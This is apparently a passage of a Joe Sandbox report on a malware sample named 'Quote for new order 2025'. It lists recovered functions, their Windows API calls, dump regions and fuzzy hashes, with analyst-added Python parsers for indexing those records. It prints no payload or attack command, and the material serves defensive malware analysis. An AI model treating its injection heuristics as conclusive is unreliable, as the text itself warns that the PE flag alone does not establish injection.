                                                                                                                                                         • Rendered graph not reproduced; recovered from its edge list: basic blocks 1557540-155770d, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, an internal routine at 155770f, then GetCurrentThreadId
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 015575BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 015575FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01557638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 01557691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 80a57ba6e6972e6c3441eed3ee1b90640466741e0fe605cb73b6df5897f3ca56
                                                                                                                                                        • Instruction ID: 6f76f1a21ba2c45635c31833ccfe5b51c5f2286b1931b968e048877ac281026a
                                                                                                                                                        • Opcode Fuzzy Hash: 80a57ba6e6972e6c3441eed3ee1b90640466741e0fe605cb73b6df5897f3ca56
                                                                                                                                                        • Instruction Fuzzy Hash: A15143B09007498FDB54DFAAD548BDEBBF1BB48314F20C45AD419AB360DB34A984CF65

                                                                                                                                                         Control-flow Graph
                                                                                                                                                         • Rendered graph not reproduced; recovered from its edge list: basic blocks 155d4c8-155d758, one API call to GetModuleHandleW (block 155d710-155d73b) and internal calls to 155c374, 155d770, 155c380, 155c390, 155da50, 155c148 and 155c3a0
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0155D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 8045047f6de761102e1ae71963a80f61b206d61cb6eec7be24f274b20c8e1c8b
                                                                                                                                                        • Instruction ID: 909d8b764aefdbba38b371763445a15eea7a92473e9503ff75bb9e2088ce7536
                                                                                                                                                        • Opcode Fuzzy Hash: 8045047f6de761102e1ae71963a80f61b206d61cb6eec7be24f274b20c8e1c8b
                                                                                                                                                        • Instruction Fuzzy Hash: 3A814671A00B058FDB65DF6AD45479ABBF1FF88304F00892ED486CBA50D774E945CB91
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0155FBE2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: 275e27672d6ff092af48e3c003f0dcfdea5e1ed0dab99b0a95d1cb06c40a72ec
                                                                                                                                                        • Instruction ID: 56077337726a593b0be055e51485670bbd98881ac3b25f308c8daffd458fc3c7
                                                                                                                                                        • Opcode Fuzzy Hash: 275e27672d6ff092af48e3c003f0dcfdea5e1ed0dab99b0a95d1cb06c40a72ec
                                                                                                                                                        • Instruction Fuzzy Hash: 7A41BDB1D00309DFDB14CFAAC894ADEBBB5FF48310F24852AE819AB210D7749885CF91
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 09E5FDA8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: 86dca6bd56ce9328b5846eb29569aca96a630a989c771941d9662379dc52b44c
                                                                                                                                                        • Instruction ID: 987ae72662aeb934825f03f094c751a1cfafc6af0cd6f16b2e608d4e863b9550
                                                                                                                                                        • Opcode Fuzzy Hash: 86dca6bd56ce9328b5846eb29569aca96a630a989c771941d9662379dc52b44c
                                                                                                                                                        • Instruction Fuzzy Hash: 0A2138B1900249DFCB10CF9AC885BDEBBF4EB48310F04846AE955A7651C3789944CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09E53655,?,?), ref: 09E53707
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: f20e895af5db7a568854188463a1edb6066a3747f40b14c9305d45517dd3697d
                                                                                                                                                        • Instruction ID: 536aea6a3dee8537f7fd1a5e56511b727693d795a8a5802ebebd7965ef8a3908
                                                                                                                                                        • Opcode Fuzzy Hash: f20e895af5db7a568854188463a1edb6066a3747f40b14c9305d45517dd3697d
                                                                                                                                                        • Instruction Fuzzy Hash: B231E4B5D00209DFDB14CF9AD884ADEBBF4EB48364F14942AE915A7310D774A940CFA4
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09E53655,?,?), ref: 09E53707
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: 569a4154b66ca7d2a097a1bd3ab3d201f372656d0e80ffcb4b0970d91acd3105
                                                                                                                                                        • Instruction ID: 9b3e2bff3955ab4b96f3f5f9a0c0493666c65730c7991f64968610d8c0928ea7
                                                                                                                                                        • Opcode Fuzzy Hash: 569a4154b66ca7d2a097a1bd3ab3d201f372656d0e80ffcb4b0970d91acd3105
                                                                                                                                                        • Instruction Fuzzy Hash: 1231E4B5D00249DFDB14CF99D884A9EFBF5BF48314F14842AE815A7220D374A944CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 4aaff988c24add6e512f81a8ca6f7a16c3b07065adfe7d7963bb309e9244817e
                                                                                                                                                        • Instruction ID: 6ba5e51807b12c0132c9065aef483dda7e220bf92c12ec7575f9e1ce27d9c854
                                                                                                                                                        • Opcode Fuzzy Hash: 4aaff988c24add6e512f81a8ca6f7a16c3b07065adfe7d7963bb309e9244817e
                                                                                                                                                        • Instruction Fuzzy Hash: 0A2105B59002489FDB10CFAAD884ADEBFF4FB48320F14841AE914A7350D378A940CFA4
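                                                                                                                                                         The blocks above share one fixed layout: an APIs list (call name, module, arguments, call-site address), a Memory Dump Source line (dump file, load offset, whether the region is backed by a PE image), the IDA plugin snapshot, the Similarity IDs and the opcode/instruction hashes. That layout is regular enough to parse, which is how an analyst pivots from a signature in the report summary to the dump region and call site that produced it. The parser below is an added example, not part of the Joe Sandbox report or its tooling; the sample text is copied from the blocks on this page (trimmed), the record and summary structure is my own, and the only field semantics assumed are the ones printed here (Offset, based on PE, ref addresses).

```python
"""Parse Joe Sandbox "Memory Dump Source" blocks and summarise, per dumped region, which Windows APIs the recovered code calls."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• GetModuleHandleW.KERNEL32(00000000), ref: 0155D72E"  or  "• GetCurrentProcess.KERNEL32 ref: 015575BE"
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)", re.I)
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")   # "• Opcode ID: ...", "• API ID: ..."

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                      # call-site address inside the dump

@dataclass
class Block:                      # one recovered function
    apis: List[ApiCall] = field(default_factory=list)
    source_file: Optional[str] = None
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None
    fields: Dict[str, str] = field(default_factory=dict)

def parse_blocks(text: str) -> List[Block]:
    blocks: List[Block] = []
    cur = Block()

    def flush() -> None:
        nonlocal cur
        if cur.source_file is not None or cur.apis:
            blocks.append(cur)
        cur = Block()

    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # a function with recognised calls starts here
            flush()
        elif line == "Memory Dump Source":      # a function without an APIs list starts here
            if cur.source_file is not None:
                flush()
        elif (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif (m := SRC_RE.search(line)):
            cur.source_file, cur.offset = m["file"], int(m["offset"], 16)
            cur.pe_backed = m["pe"].lower() == "true"
        elif (m := FIELD_RE.match(line)):       # Opcode ID, Instruction ID, API ID, ...
            cur.fields[m["key"]] = m["val"]
        # graph/legend residue ("• Executed", "control_flow_graph ...") matches nothing and is skipped
    flush()
    return blocks

def summarize(blocks: List[Block]) -> Dict[str, dict]:
    """Per dump region (hex offset): PE-backed flag, function count, sorted set of APIs called."""
    regions: Dict[str, dict] = {}
    for b in blocks:
        if b.offset is None:
            continue
        r = regions.setdefault(f"{b.offset:08X}", {"pe_backed": b.pe_backed, "functions": 0, "apis": set()})
        r["functions"] += 1
        r["apis"].update(f"{a.name}.{a.module}" for a in b.apis)
    return {k: {**r, "apis": sorted(r["apis"])} for k, r in regions.items()}

def regions_calling(blocks: List[Block], api_names) -> List[str]:
    """Regions whose recovered code calls any of api_names (case-insensitive)."""
    wanted = {n.lower() for n in api_names}
    return sorted({f"{b.offset:08X}" for b in blocks
                   if b.offset is not None and any(a.name.lower() in wanted for a in b.apis)})

# Constructed sample: lines copied from the report blocks on this page, trimmed to the parsed fields.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32 ref: 015575BE
• GetCurrentThread.KERNEL32 ref: 015575FB
• GetCurrentThreadId.KERNEL32 ref: 01557691
Memory Dump Source
• Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
• API ID: Current$ProcessThread
• Opcode ID: 9febd8c4392317245ca0b4df50027b5e13e60b8ac99cab0782f9fd23a166c296
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0155D72E
Memory Dump Source
• Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155780F
Memory Dump Source
• Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
Memory Dump Source
• Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
APIs
• PeekMessageW.USER32(?,?,?,?,?), ref: 09E5FDA8
Memory Dump Source
• Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
"""

if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE)
    for off, r in summarize(blocks).items():
        # "based on PE: false" = code running from memory not mapped from an image file on disk
        print(off, "PE-backed" if r["pe_backed"] else "not PE-backed", r["functions"], "functions", r["apis"])
    print("regions calling DuplicateHandle:", regions_calling(blocks, ["DuplicateHandle"]))
```

                                                                                                                                                         One caveat when reading the summary this produces: every region on this page is marked "based on PE: false", which only says the code was executing from memory that is not mapped from an image file. For a .NET sample that is exactly where JIT-compiled managed code lives, and for a native sample it is where unpacked or injected code lands, so the flag narrows where to look in the dumps but does not by itself establish injection.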
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 09E5F405
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 06709e8dcd6f99cb1fddd4daa923c86382ee4f4132577edd64b7831a0fd5ae57
                                                                                                                                                        • Instruction ID: 864f6d6a69306ca5e2065d712cd84f5c44eda1fa3a8ce43691841b4afa863299
                                                                                                                                                        • Opcode Fuzzy Hash: 06709e8dcd6f99cb1fddd4daa923c86382ee4f4132577edd64b7831a0fd5ae57
                                                                                                                                                        • Instruction Fuzzy Hash: F6216D718083898FCB11CFA9C845BDEBFF4EB0A210F14849AD854E7262C378A945CBA5
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 6226629d5ca235457b144369b75e083815045d3431b973e481af9672bcd3ab23
                                                                                                                                                        • Instruction ID: e149073c8264568143a82d9dddb4ff6ae80b7277f109ce5e21ef2bc3df8a8c24
                                                                                                                                                        • Opcode Fuzzy Hash: 6226629d5ca235457b144369b75e083815045d3431b973e481af9672bcd3ab23
                                                                                                                                                        • Instruction Fuzzy Hash: 6121E4B5D002089FDB10CFAAD984ADEBFF4FB48320F14841AE914A7350D374A944CFA4
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 1b85b169b1bdfba5b7096702e4b68ef56d0da7ad01275406910c4bdc8f705ff1
                                                                                                                                                        • Instruction ID: a3faedad0635b4a5b4ebd6853c5df23062fc816e5f90acd32745f0d80084cb74
                                                                                                                                                        • Opcode Fuzzy Hash: 1b85b169b1bdfba5b7096702e4b68ef56d0da7ad01275406910c4bdc8f705ff1
                                                                                                                                                        • Instruction Fuzzy Hash: 262124B1D006598FDB10CF9AD4457DEFBF4EB88324F10806AD458A3250D338A645CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 09E5FDA8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: f15f5faaeab7cd99f16a4ec65e852ad49be930fe2b142ae44f563bac64b34c8c
                                                                                                                                                        • Instruction ID: 6d73f35b920419e8c0d3137c22f79955056ef61faf518f050de634516405a185
                                                                                                                                                        • Opcode Fuzzy Hash: f15f5faaeab7cd99f16a4ec65e852ad49be930fe2b142ae44f563bac64b34c8c
                                                                                                                                                        • Instruction Fuzzy Hash: ED1107B5800249DFDB10CF9AD585BDEFBF8EB48320F10842AE959A3251C378A944CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 09E5F405
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 03d72e3235edf9710687004df98f493eabe1726e30f25e9950b59e2f1adcb840
                                                                                                                                                        • Instruction ID: fe34902d2de3eba459b5612f7d19df649808f8545afb3cf6f1cf668c24b5436a
                                                                                                                                                        • Opcode Fuzzy Hash: 03d72e3235edf9710687004df98f493eabe1726e30f25e9950b59e2f1adcb840
                                                                                                                                                        • Instruction Fuzzy Hash: F61118B5800349DFDB10CF9AC885BDEFBF8EB48324F108419E954A7251D378A984CFA5
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0155D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: ab929709ea457862d5a3f42ce9d99abcee2da641b763be855512c511df6b23b5
                                                                                                                                                        • Instruction ID: f1e8da4b5f0fa6b1da0bb4905cc004bbc9369c41395341c0bc64d125fd5f958c
                                                                                                                                                        • Opcode Fuzzy Hash: ab929709ea457862d5a3f42ce9d99abcee2da641b763be855512c511df6b23b5
                                                                                                                                                        • Instruction Fuzzy Hash: ED11E0B6C006498FDB14CF9AC444BDEFBF5AB88324F10842AD959A7210D379A545CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: da8983e1b24c0676d0fc1ac6c65b27fa156af9a31ee0516691b0617fb4ffd74b
                                                                                                                                                        • Instruction ID: 5ea30af032a2b4fac3d27970ca351e0dfc08fd46f79136ffece9171fe6632e26
                                                                                                                                                        • Opcode Fuzzy Hash: da8983e1b24c0676d0fc1ac6c65b27fa156af9a31ee0516691b0617fb4ffd74b
                                                                                                                                                        • Instruction Fuzzy Hash: 861100B1C006498FCB10DF9AD444BCEFBF4EB88324F10842AD458A3250C378A944CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: ed3a0fa4478b10f542b9336d95151baeb751fcce399ee7dc2c0bd341fb3a7838
                                                                                                                                                        • Instruction ID: a0be00606c0a06acd045920485d8b8c1d71e71add30e976567ae53c330bd3943
                                                                                                                                                        • Opcode Fuzzy Hash: ed3a0fa4478b10f542b9336d95151baeb751fcce399ee7dc2c0bd341fb3a7838
                                                                                                                                                        • Instruction Fuzzy Hash: 491100B1C00649CFCB20DF9AD444BCEFBF4EB88324F10852AD418A3250C378A984CFA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 6d125bf76ef15b86f582ab973450d1a096e85312b61218330de9cfd6182e07b8
                                                                                                                                                        • Instruction ID: 1644b6db820a822561777fc5856cfd10bcd448d922eaa151bb63f1222e336e93
                                                                                                                                                        • Opcode Fuzzy Hash: 6d125bf76ef15b86f582ab973450d1a096e85312b61218330de9cfd6182e07b8
                                                                                                                                                        • Instruction Fuzzy Hash: 541100B5C00649CFCB20DFAAD545BCEFBF4EB88324F10856AD458A7250C379A984CFA5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9a06f6f7e0cb3c84155e68f8e000a6720192bbfa6bd2a2690a030722f88cdca2
                                                                                                                                                        • Instruction ID: 00d539eadfded16d0e33fd25b301a347cc46f2745acce0f86d2b503a54476f47
                                                                                                                                                        • Opcode Fuzzy Hash: 9a06f6f7e0cb3c84155e68f8e000a6720192bbfa6bd2a2690a030722f88cdca2
                                                                                                                                                        • Instruction Fuzzy Hash: 5B21F779904200DFDB06DF98D9C4B1BBF65FB88320F20C56EEA054A366C336D416CBA2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05be211752cda14fcff0cb28db6d0090252b4feb4263ee408d8b7b728e923de7
                                                                                                                                                        • Instruction ID: e73a7fc6affd73ab3c0d0c077887aff2bb3b85955a775e9570e84444c3c32033
                                                                                                                                                        • Opcode Fuzzy Hash: 05be211752cda14fcff0cb28db6d0090252b4feb4263ee408d8b7b728e923de7
                                                                                                                                                        • Instruction Fuzzy Hash: 2E210771504201EFDB06DFD8D5C0B2ABBB5FB84324F20C96DE9094F296C33AD446CA61
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 35b938fd174e04ca896428517fd19080d7b0ebbf7aa6804af16d1f16efef1ae1
                                                                                                                                                        • Instruction ID: 1eedf33098e4dfaf4c0442d0b7409a0d85085998618073d47ebfa28a68580744
                                                                                                                                                        • Opcode Fuzzy Hash: 35b938fd174e04ca896428517fd19080d7b0ebbf7aa6804af16d1f16efef1ae1
                                                                                                                                                        • Instruction Fuzzy Hash: DC210071604200DFDB16DFD8D994B2ABBB5FB84314F20C969D80E4F296D33AD446CA61
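The records in this section are easier to pivot on (across reports, or against a local corpus of earlier dumps) once they are rows rather than printed text. The parser below is an added example and is not code from Joe Sandbox or its IDA plugin; it reads the "APIs / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity" layout exactly as printed above, taking a record to start at each "Memory Dump Source" line with an optional "APIs" block immediately before it (an assumption drawn from the records on this page). Its input is three records copied from this section. The helper names (`parse_records`, `by_region`, `hash_consistency`, `pivot_index`, `unlabelled`) are my own, not plugin terminology.

```python
"""Parse Joe Sandbox IDA-plugin function records into rows that can be
indexed on Opcode ID, resolved API call and dump region.  Added example,
not part of the Joe Sandbox report."""
import re
from collections import defaultdict

BULLET = "• "
# Resolved call line, e.g. "PostMessageW.USER32(?,?,?,?), ref: 09E5F405"
API_CALL = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# "Source File" value, e.g. "<name>.sdmp, Offset: 01550000, based on PE: false"
SOURCE = re.compile(
    r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

# Three records copied from this section of the report (leading whitespace removed).
SAMPLE = """\
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155780F
Memory Dump Source
• Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 6226629d5ca235457b144369b75e083815045d3431b973e481af9672bcd3ab23
• Instruction ID: e149073c8264568143a82d9dddb4ff6ae80b7277f109ce5e21ef2bc3df8a8c24
• Opcode Fuzzy Hash: 6226629d5ca235457b144369b75e083815045d3431b973e481af9672bcd3ab23
• Instruction Fuzzy Hash: 6121E4B5D002089FDB10CFAAD984ADEBFF4FB48320F14841AE914A7350D374A944CFA4
APIs
Memory Dump Source
• Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: 1b85b169b1bdfba5b7096702e4b68ef56d0da7ad01275406910c4bdc8f705ff1
• Instruction ID: a3faedad0635b4a5b4ebd6853c5df23062fc816e5f90acd32745f0d80084cb74
• Opcode Fuzzy Hash: 1b85b169b1bdfba5b7096702e4b68ef56d0da7ad01275406910c4bdc8f705ff1
• Instruction Fuzzy Hash: 262124B1D006598FDB10CF9AD4457DEFBF4EB88324F10806AD458A3250D338A645CFA5
Memory Dump Source
• Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
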